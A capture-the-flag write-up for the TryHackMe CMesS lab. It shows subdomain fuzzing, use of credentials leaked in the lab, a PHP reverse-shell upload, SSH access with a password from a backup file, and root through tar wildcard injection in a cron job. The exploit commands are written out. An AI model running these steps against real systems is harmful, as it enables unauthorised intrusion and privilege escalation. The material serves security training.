✅TryHackMe - CMesS (Medium)

Summary

Subdomain fuzzing with Wfuzz finds a hidden domain dev.cmess.htb. This domain hosts a static page that leaks CMS admin panel credential. In the admin panel, there is an upload form where we can upload php-reverse-shell.php and catch a reverse shell as www-data.

On the victim machine, there is a backup file that leaks the user Andre's password. At this stage we can SSH in as Andre and get a user shell.

In the privilege escalation phase, we find a "cron wildcard" vulnerability and get a root shell with tar injection.

IP

• RHOST: 10.10.39.82

• LHOST: 10.13.12.2

Nmap

Nmap

Directory Fuzzing

Fuzz directory using Gobuster:

gobuster dir -u http://cmess.thm/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

Gobuster finds a directory /admin:

Gobuster

The directory /admin has a login form, but we don't know the credential yet:

Login form

VHost Discovery

Fuzz subdomain using Wfuzz:

wfuzz -c -u 'http://cmess.thm' -H "Host:FUZZ.cmess.thm" -w top5000.txt --hw 290

Wfuzz finds dev.cmess.thm:

Update /etc/hosts:

/etc/hosts

Admin Panel: Leaked Credential in Hidden Subdomain

http://dev.cmess.thm has a development log. Through the convention between Andre and the support, we can learn his credential andre@cmess.thm:KPFTN_f2yxe%:

Development Log

Use this credential for admin panel login and now we have access to the admin panel:

Admin panel

www-data Shell: File Upload

Go to "Content => File Manager" and we find an upload form:

Upload form

Upload php-reverse-shell.php. It turns out that the uploaded files are stored in /assets:

assets

Start a pwncat listener:

pwncat-cs :443

Trigger the reverse shell payload at http://cmess.thm/assets/php-reverse-shell.php and catch a reverse shell as www-data:

www-data shell

User Shell: Leaked Credential in Backup File

LinPEAS finds a readable backup file /opt/.password.bak:

/opt/.password.bak

This file contains Andre's password:

Andre's password

SSH in using the credential andre:UQfsdCB7aAP6 and now we get a user shell:

User shell

Privilege Escalation: Cron Wildcard

Examine crontab:

Crontab

This falls into the "cron wildcard" scenario. To learn more, read my note:

https://www.ctfnote.com/pentest/linux-privilege-escalation/cron-jobswww.ctfnote.com

Linux Privilege Escalation: Cron Jobs

Prepare a payload:

$ echo 'cp /bin/bash /tmp/bash; chmod +s /tmp/bash' > ~/backup/runme.sh
$ chmod +x ~/backup/runme.sh
$ touch ~/backup/--checkpoint=1
$ touch ~/backup/--checkpoint-action=exec=sh\ runme.sh

Wait 2 minutes for the cronjob to run the payload script and then spawn a root shell:

/tmp/bash -p

Now we have a root shell:

root shell